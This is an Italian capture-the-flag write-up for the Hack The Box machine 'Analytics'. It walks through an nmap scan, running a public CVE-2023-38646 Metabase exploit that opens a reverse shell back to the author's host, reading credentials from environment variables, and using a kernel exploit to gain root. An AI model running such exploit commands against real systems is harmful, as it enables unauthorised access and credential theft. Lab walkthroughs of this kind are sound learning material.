Analytics
Autore: Lord Shiva • Aggiornamento: 02.12.2023 • Tempo di lettura: 08 min.
Come sempre il primo passo è quello di analizzare le porte aperte facendo una scansione con nmap:
nmap analytical.htb
e questo è il risultato:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-02 08:41 CET
Nmap scan report for analytical.htb (10.10.11.233)
Host is up (0.063s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Analytical
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds
Nel sito c\'è un\'area login interessante.
Navigando su internet in cerca di vulnerabilità, ho trovato questo exploit di seguito che potrebbe fare al caso nostro.
Mi scarico il programma CVE-2023-38646-Reverse-Shell.py e lo eseguo
sudo python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.14.6 --lport 1234A questo punto sono dentro alla machcina, provo a lanciare il comando printenv e mi restituisce il seguente output:
printenv
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=14c5e9c28b25
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=******************
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=4
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/bin/printenvPassword utente trovata.... e anche la flag: 18b..........................67a
Adesso proviamo a fare un\'escalation dei privilegi.
Provo a vedere se ha qualche comando sudo, ma niente.
Facendo un semplice uname -a verifico la release del sistema operativo e... Poi ho trovato il repository Github contenente l\'exploit CVE-2023–2640-CVE-2023–32629. Utilizzando questo exploit ottengo l\'accesso root. Sìì!!
6b6.........................92a